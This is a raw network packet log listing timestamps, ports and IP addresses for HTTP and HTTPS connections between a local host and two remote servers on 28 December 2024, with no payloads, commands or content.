Dec 28, 2024 09:34:44.710278988 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710377932 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710386992 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710439920 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710448980 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710604906 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710614920 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710623026 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710632086 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710741043 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710751057 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710761070 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710792065 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.711165905 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.821320057 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821342945 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821389914 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821445942 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821535110 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821544886 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821603060 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821651936 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821717024 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821727037 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821768045 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821824074 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821929932 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821938992 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821983099 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.821993113 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822067022 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822092056 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822164059 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822175026 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822283983 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822294950 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822348118 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822359085 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822501898 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822511911 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822557926 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822612047 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822642088 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822763920 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822782040 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822792053 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822858095 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822875977 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.822948933 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823008060 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823101997 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823146105 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823157072 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823173046 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823283911 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823292971 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823357105 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823376894 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823466063 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823522091 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823566914 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823657036 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823666096 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823709011 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823801041 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823831081 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.823895931 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.824034929 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.830776930 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.830861092 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.830944061 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.830954075 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.830991983 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831001997 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831063032 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831073046 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831088066 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831129074 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831183910 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831202984 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831280947 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831300020 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831352949 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831444025 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831454039 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831464052 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831506968 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831542969 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831609011 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831619024 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831690073 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831715107 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831857920 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831867933 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831871986 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831881046 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831940889 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.831974983 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832096100 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832106113 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832148075 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832156897 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832276106 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832284927 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832295895 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832313061 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832413912 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832422972 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832468033 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.832488060 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:47.234494925 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:47.234632015 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:47.234692097 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:47.234812021 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:47.354202986 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:47.395001888 CET	49741	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:47.514645100 CET	80	49741	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:47.516988993 CET	49741	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:47.545162916 CET	49741	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:47.664643049 CET	80	49741	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:48.880820036 CET	80	49741	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:48.880889893 CET	80	49741	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:48.880954027 CET	49741	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:48.881217003 CET	49741	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:49.000659943 CET	80	49741	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:49.030282021 CET	49748	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:49.150051117 CET	80	49748	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:49.150145054 CET	49748	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:49.150624990 CET	49748	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:49.270106077 CET	80	49748	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:50.691662073 CET	80	49748	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:50.691684008 CET	80	49748	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:50.691781044 CET	49748	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:50.692039967 CET	49748	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:50.811537981 CET	80	49748	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:51.756634951 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:51.756681919 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:51.757067919 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:51.770370007 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:51.770390987 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.034069061 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.034167051 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.113656044 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.113686085 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.115303040 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.169809103 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.176361084 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.176404953 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.176686049 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.947223902 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.947544098 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.947788954 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.949522972 CET	49754	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.949548006 CET	443	49754	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.982569933 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.982620955 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:53.982685089 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.983365059 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:53.983381033 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.202208996 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.202332973 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.203649044 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.203660011 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.204632044 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.210870981 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.210890055 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.210968971 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.974940062 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.975083113 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.975151062 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.975166082 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.975266933 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.975320101 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.975327969 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.977255106 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.977313042 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.977320910 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.985682964 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.985755920 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.985764027 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.994173050 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:55.994230032 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:55.994239092 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.044862986 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.094077110 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.138544083 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.166352987 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170109987 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170197964 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170208931 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.170226097 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170281887 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.170301914 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170447111 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.170455933 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170475006 CET	49760	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.170483112 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.170490980 CET	443	49760	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.291028976 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.291084051 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:56.291178942 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.291507006 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:56.291522026 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:57.558350086 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:57.558546066 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:57.559833050 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:57.559849024 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:57.560086966 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:57.561347008 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:57.561522961 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:57.561553001 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:58.478024960 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:58.478127956 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:58.478188038 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:58.478373051 CET	49766	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:58.478390932 CET	443	49766	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:58.563585997 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:58.563632011 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:58.563719034 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:58.564079046 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:58.564090967 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:59.828459024 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:59.828547955 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:59.830120087 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:59.830132961 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:59.830460072 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:59.831765890 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:59.831952095 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:59.831984997 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:34:59.832051992 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:34:59.879329920 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:00.633706093 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:00.633963108 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:00.634027004 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:00.638211966 CET	49772	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:00.638233900 CET	443	49772	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:00.877398014 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:00.877451897 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:00.877542973 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:00.877854109 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:00.877870083 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:02.092293024 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:02.092410088 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:02.094197989 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:02.094203949 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:02.094554901 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:02.095866919 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:02.096034050 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:02.096071005 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:02.096144915 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:02.096153975 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:03.061484098 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:03.061614037 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:03.061664104 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:03.061784029 CET	49778	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:03.061793089 CET	443	49778	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:03.177155972 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:03.177196980 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:03.177297115 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:03.177630901 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:03.177649975 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:04.435065985 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:04.435142040 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:04.436579943 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:04.436592102 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:04.436829090 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:04.438098907 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:04.438184977 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:04.438189983 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:05.322134018 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:05.322448969 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:05.322541952 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:05.322663069 CET	49784	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:05.322693110 CET	443	49784	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:05.719917059 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:05.719973087 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:05.720051050 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:05.720340014 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:05.720355034 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.931282997 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.931421041 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.932723999 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.932734966 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.932971954 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.934169054 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.934894085 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.934923887 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935031891 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935060978 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935193062 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935230970 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935367107 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935394049 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935554028 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935575962 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935715914 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935743093 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935750008 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935765028 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935861111 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.935877085 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.935889959 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.936011076 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.936037064 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.979342937 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.979609013 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.979651928 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.979667902 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.979686975 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.979706049 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.979712963 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:06.979729891 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:06.979733944 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:09.209280014 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:09.209376097 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:09.209465027 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:09.209661961 CET	49790	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:09.209676027 CET	443	49790	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:09.221451998 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:09.221487045 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:09.221573114 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:09.221878052 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:09.221889973 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:10.480552912 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:10.480730057 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:10.521282911 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:10.521305084 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:10.521653891 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:10.540080070 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:10.540098906 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:10.540169001 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270683050 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270733118 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270766973 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270790100 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.270803928 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270842075 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270847082 CET	49801	443	192.168.2.7	172.67.128.184
Dec 28, 2024 09:35:11.270852089 CET	443	49801	172.67.128.184	192.168.2.7
Dec 28, 2024 09:35:11.270941019 CET	49801	443	192.168.2.7	172.67.128.184
